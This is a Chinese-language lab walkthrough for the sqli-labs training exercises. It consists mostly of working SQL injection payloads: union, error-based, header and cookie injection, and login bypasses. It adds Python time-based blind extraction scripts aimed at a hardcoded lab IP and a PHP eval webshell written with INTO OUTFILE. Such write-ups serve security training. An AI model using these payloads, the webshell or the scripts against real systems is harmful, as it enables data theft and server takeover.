概述
Less-1
?id=1' order by 3
#正常
?id=1' order by 4
#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
# information_schema,challenges,mysql,performance_schema,security
?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') --+
# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users') --+
# id,username,password
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
# Dumb,Angelina, Dummy, secure,stupid, superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2
# 方法同上，不过此题为数字型注入：id 没有被引号包裹，payload 不需要闭合引号，也无需在末尾加 --+ 注释。
?id=666 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)
Less-3
?id=666') union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
Less-4
?id=666") union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
Less-5
# 页面没有显示位（union 查询的结果不会回显到页面上），无法使用联合查询注入，改用报错注入：把要读取的数据拼进 MySQL 的报错信息里带出来。
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'users;1' for key 'group_key'
# 以此类推：改变 limit 的偏移量逐条取出表名，再用同样的方法读取 information_schema.columns 中的列名和 users 表里的数据。
Less-6
# 把'换成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# 写入成功后用一句话木马客户端连接即可。注意：into outfile 要求当前数据库用户具有 FILE 权限、secure_file_priv 未限制写出目录，并且要知道网站目录的绝对路径且该路径对 mysqld 进程可写，上面的 "path" 需替换为这个路径；这类 webshell 只应在授权的靶场环境中使用。
Less-8
# '))改为'
Less-9&10
#区别是前者'后者"
#经过测试发现本题是时间盲注,附上脚本:
# coding:utf-8
import requests
import datetime
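def database_len(url, *, max_len=9, delay=1, fetch=None):
    """Recover the length of ``database()`` through a time-based blind oracle.

    Each probe appends ``?id=1' and if(length(database())>i,sleep(delay),0)``
    plus ``%23`` (a URL-encoded ``#`` that comments out the rest of the
    original query) to *url*.  A response that takes at least *delay*
    seconds means the condition held.

    Args:
        url: Base URL of the vulnerable page, e.g. ``http://host/Less-9/``.
        max_len: Largest length probed (the original hard-coded 9).
        delay: Seconds passed to ``sleep()`` and used as the decision
            threshold.  Network latency near this value causes misreads,
            so raise it on a slow link.
        fetch: Callable taking the full probe URL and performing the GET.
            Defaults to ``requests.get``; injectable for testing.

    Returns:
        The recovered length (first ``i`` for which ``length > i`` is false).

    Raises:
        RuntimeError: if every probe up to *max_len* still sleeps, i.e. the
            name is longer than *max_len*.  The original silently returned
            ``max_len`` in that case, which then truncated the name.
    """
    if fetch is None:
        fetch = requests.get
    for i in range(1, max_len + 1):
        payload = '''?id=1' and if(length(database())>%s,sleep(%s),0)''' % (i, delay)
        started = datetime.datetime.now()
        fetch(url + payload + '%23')
        elapsed = (datetime.datetime.now() - started).total_seconds()
        print(i)
        if elapsed < delay:
            # ``length > i`` is false while ``length > i-1`` held, so length == i.
            print('database_len:', i)
            return i
    raise RuntimeError('database() is longer than %d characters' % max_len)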
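def database_name(url, database_len, *, delay=1, fetch=None,
                  charset='0123456789abcdefghijklmnopqrstuvwxyz'):
    """Recover ``database()`` character by character via a time-based oracle.

    For every position 1..*database_len* each candidate in *charset* is
    probed with ``?id=1' and if(substr(database(),j,1)='c',sleep(delay),1)``
    followed by ``%23`` (URL-encoded ``#``); a slow response identifies the
    character.  Recovery progress is printed as it goes, like the original.

    Args:
        url: Base URL of the vulnerable page.
        database_len: Number of characters to recover (from ``database_len()``).
        delay: Seconds passed to ``sleep()`` and used as the threshold.
        fetch: Callable performing the GET for a full URL; defaults to
            ``requests.get``.
        charset: Candidate characters.  Note the default has no ``_`` or
            uppercase letters; the ``=`` comparison is case-insensitive under
            MySQL's default collations, but ``_`` must be added for names such
            as ``information_schema``.

    Returns:
        The recovered name.  A position matched by no candidate is rendered
        as ``?`` instead of being silently skipped (which in the original
        shifted every following character left).
    """
    if fetch is None:
        fetch = requests.get
    name = ''
    for j in range(1, database_len + 1):
        found = '?'
        for candidate in charset:
            payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(%s),1)''' % (
                j, candidate, delay)
            started = datetime.datetime.now()
            fetch(url + payload + '%23')
            elapsed = (datetime.datetime.now() - started).total_seconds()
            if elapsed >= delay:
                found = candidate
                break
        name += found
        print(name)
    print('database_name:', name)
    return name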
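if __name__ == '__main__':
    # The author's sqli-labs training instance (Less-9, single-quote
    # time-based blind).  Only point this at hosts you are authorised to test.
    url = '''http://43.247.91.228:84/Less-9/'''
    # Bind the result to a fresh name: the original rebound ``database_len``
    # itself to an int, shadowing the function for the rest of the module.
    db_len = database_len(url)
    database_name(url, db_len)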
#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#' or '1'='1绕过
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#") or ("1")=("1绕过
Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) #
#>XPATH syntax error: ':security'
或者
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) #
# Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')换成"
Less-15
# 页面对注入既不回显数据也不报错，用万能密码确认闭合符是 '，于是采用时间盲注；对之前的脚本做了升级，这次每个探测请求各用一个线程并行发送。注意并发的 sleep() 探测都以固定秒数为阈值，网络抖动会造成误判，必要时加大阈值。
# coding:utf-8
import requests
import datetime
import threading
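def database_len(url, i, *, delay=2, post=None):
    """Time-based oracle for ``length(database()) > i`` on the Less-15 login form.

    Posts ``uname=admin' and if(length(database())>i,sleep(delay),0) #`` with a
    dummy password and measures the round trip.

    Args:
        url: URL of the login form, e.g. ``http://host/Less-15/``.
        i: Length to compare against.
        delay: Seconds passed to ``sleep()`` and used as the threshold.
        post: Callable ``post(url, data=...)`` performing the request;
            defaults to ``requests.post``, injectable for testing.

    Returns:
        True when the response took at least *delay* seconds (condition held),
        False otherwise.  A slow network can turn False into True.
    """
    if post is None:
        post = requests.post
    postdata = {
        'uname': '''admin' and if(length(database())>%s,sleep(%s),0) #''' % (i, delay),
        'passwd': '''1''',
    }
    started = datetime.datetime.now()
    post(url, data=postdata)
    elapsed = (datetime.datetime.now() - started).total_seconds()
    return elapsed >= delay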
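def database_name(url, j, *, delay=2, post=None,
                  charset='0123456789abcdefghijklmnopqrstuvwxyz'):
    """Recover character *j* (1-based) of ``database()`` on the Less-15 form.

    Each candidate is probed with
    ``uname=admin' and if(substr(database(),j,1)='c',sleep(delay),1) #``;
    the first candidate whose response takes at least *delay* seconds wins.

    Args:
        url: URL of the login form.
        j: 1-based character position.
        delay: Seconds passed to ``sleep()`` and used as the threshold.
        post: Callable ``post(url, data=...)``; defaults to ``requests.post``.
        charset: Candidate characters (default lacks ``_`` and uppercase).

    Returns:
        The matching character, or None when no candidate matched — callers
        must handle None rather than concatenate it.
    """
    if post is None:
        post = requests.post
    for candidate in charset:
        postdata = {
            'uname': '''admin' and if(substr(database(),%d,1)='%s',sleep(%s),1) #''' % (
                j, candidate, delay),
            'passwd': '''1''',
        }
        started = datetime.datetime.now()
        post(url, data=postdata)
        elapsed = (datetime.datetime.now() - started).total_seconds()
        if elapsed >= delay:
            return candidate
    return None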
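class MyThread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value.

    ``threading.Thread`` discards its target's return value; this subclass
    stores it so the caller can read it after ``join()``.
    """

    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
        # Pre-set so getresult() before run() returns None instead of raising
        # AttributeError (the original only assigned it inside run()).
        self.res = None

    def getresult(self):
        """Return what ``func`` returned, or None if run() has not completed."""
        return self.res

    def run(self):
        self.res = self.func(*self.args)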
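def main():
    """Recover the length and name of ``database()`` on Less-15, one thread per probe.

    Length probes are launched in batches of nine (``length > 1`` .. ``> 9``,
    then ``> 10`` .. ``> 18``, ...).  The original only ever sent the first
    batch and looped forever when all nine probes came back True, i.e. for
    any name of 10 or more characters; this version advances the batch and
    gives up at 64, the MySQL identifier limit.
    """
    url = '''http://43.247.91.228:84/Less-15/'''  # author's lab host; authorised targets only
    batch = 9
    max_len = 64
    databaselength = None
    offset = 0
    while databaselength is None:
        if offset >= max_len:
            raise RuntimeError('database() is longer than %d characters' % max_len)
        threads = []
        for k in range(batch):
            t = MyThread(database_len, (url, offset + k + 1))
            threads.append(t)
            t.start()
        for k, t in enumerate(threads):
            t.join()
            # First probe for which "length > n" fails gives length == n.
            if not t.getresult():
                databaselength = offset + k + 1
                print('database_len:', databaselength)
                break
        offset += batch
    threads = []
    for k in range(databaselength):
        t = MyThread(database_name, (url, k + 1))
        threads.append(t)
        t.start()
    name = ''
    for t in threads:
        t.join()
        ch = t.getresult()
        # database_name() returns None when no candidate matched; the
        # original crashed with TypeError here instead of marking the gap.
        name += ch if ch is not None else '?'
    print("database_name :" + name)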
# Run the probe only when executed as a script, not on import.
if __name__ == "__main__":
    main()
#database_len: 8
#database_name :security
Less-16
'改成")
Less-17
# 尝试后发现这里只有提供一个存在的用户名（随便试了 admin 就可以）才能走到注入点，注入点在密码字段；密码字段会回显语法错误，于是采用报错注入。
?uname=admin&passwd=1' and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
Less-18
# 页面会返回客户端 IP 和 User-Agent；改 X-Forwarded-For（XFF）头伪造 IP 没有效果，于是尝试在 User-Agent 头注入（payload 末尾的 and '1'='1 用于闭合原语句中的引号）。
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1
# XPATH syntax error:':security'
Less-19
#显示位在referer,所以尝试在这里注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20
#在cookie里面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1
Less-21
Cookie: uname=JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICcxJz0nMQ==
# 观察发现 cookie 里的 uname 是 base64 编码的（应该是服务端先解码再拼入 SQL），所以 payload 要先做 base64 编码再放进 cookie；这种形式还是第一次见。
Less-22
#和上题一样哈,不过把'改成"
Cookie: uname=IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICIxIj0iMQ==